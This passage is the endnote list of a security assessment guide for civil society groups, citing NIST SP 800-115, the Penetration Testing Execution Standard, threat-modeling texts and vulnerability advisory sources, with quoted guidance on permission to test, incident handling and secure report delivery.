  24. "the assessment plan should provide specific guidance on incident handling in the event that assessors cause or uncover an incident during the course of the assessment. This section of the plan should define the term incident and provide guidelines for determining whether or not an incident has occurred. The plan should identify specific primary and alternate points of contact for the assessors... The assessment plan should provide clear-cut instructions on what actions assessors should take in these situations."

  25. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  26. "One of the most important documents which need to be obtained for a penetration test is the Permission to Test document."

  27. Dealing with third parties - The Penetration Testing Execution Standard

  28. APPENDIX D - Auditor Consent Template.

  29. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  30. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  31. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  32. Emergency Contact and Incidents - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  33. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  34. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  35. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  36. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  37. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  38. Acquiring API Keys

  39. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  40. See: Vulnerability Analysis

  41. Identifying Software Versions

  42. Examining Firewalls Across OS

  43. Identifying Odd/One-Off Services

  44. APPENDIX C - Password Survey

  45. Password Security

  46. Privilege Separation Across OS

  47. Anti-Virus Updates

  48. Identifying Software Versions

  49. Device Encryption By OS Type

  50. Microsoft Security Bulletin

  51. "In-Depth Reading, Vendor Information, & External Advisories"

  52. "Security-Related Vendor Information"

  53. "CERT/CC Advisories"

  54. "Security Tracker"

  55. "Known Vulnerabilities in Mozilla Products"

  56. Microsoft Security Bulletin

  57. "In-Depth Reading, Vendor Information, & External Advisories"

  58. "Security-Related Vendor Information"

  59. "CERT/CC Advisories"

  60. "Security Tracker"

  61. "Known Vulnerabilities in Mozilla Products"

  62. "While vulnerability scanners check only for the possible existence of a vulnerability, the attack phase of a penetration test exploits the vulnerability to confirm its existence."

  63. "Penetration testing also poses a high risk to the organization’s networks and systems because it uses real exploits and attacks against production systems and data. Because of its high cost and potential impact, penetration testing of an organization’s network and systems on an annual basis may be sufficient. Also, penetration testing can be designed to stop when the tester reaches a point when an additional action will cause damage." - NIST SP 800-115, Technical Guide to Information Security Testing and Assessment

  64. Network Access

  65. APPENDIX B - Personal Information to Keep Private

  66. APPENDIX B - Personal Information to Keep Private

  67. "CSOs should gradually build a culture in which all staff, regardless of technical background, feel some responsibility for their own digital hygiene. While staff need not become technical experts, CSOs should attempt to raise the awareness of every staff member, from executive directors to interns - groups are only as strong as their weakest link—so that they can spot issues, reduce vulnerabilities, know where to go for further help, and educate others."

  68. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  69. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  70. "Pre-Mortem Strategy" - Sources of Power: How People Make Decisions - p.71

  71. Corruption Perception Index

  72. The ISC Project completes evaluations of information security threats in a broad range of countries. The resulting comprehensive written assessments describe each country’s digital security situation through consideration of four main categories: online surveillance, online attacks, online censorship, and user profile/access.

  73. EISF distributes frequent analysis and summaries of issues relevant to humanitarian security risk management.

  74. The top 500 sites in each country or territory.

  75. Who publishes Transparency Reports?

  76. "Impacts: Chapter 2.7 p. 46 - Operational Security Management in Violent Environments"

  77. "Likelihood: Chapter 2.7 p. 47 - Operational Security Management in Violent Environments"

  78. "Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  79. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  80. "Threat Modeling: Designing for Security" by Adam Shostack

  81. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 125.

  82. "Threat Modeling: Designing for Security" by Adam Shostack

  83. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 401.

  84. "When a pilot lands an airliner, their job isn’t over. They still have to navigate the myriad of taxiways and park at the gate safely. The same is true of you and your pen test reports, just because its finished doesn't mean you can switch off entirely. You still have to get the report out to the client, and you have to do so securely. Electronic distribution using public key cryptography is probably the best option, but not always possible. If symmetric encryption is to be used, a strong key should be used and must be transmitted out of band. Under no circumstances should a report be transmitted unencrypted. It all sounds like common sense, but all too often people fall down at the final hurdle." - The Art of Writing Penetration Test Reports

  85. "IDEO Human-Centered Design Toolkit"

  86. "IDEO Human-Centered Design Toolkit"

  87. "IDEO Human-Centered Design Toolkit"

  88. "TechScape Indicators - the engine room"

  89. "TechScape Indicators - the engine room"

  90. "Questionnaires - The Penetration Testing Execution Standard"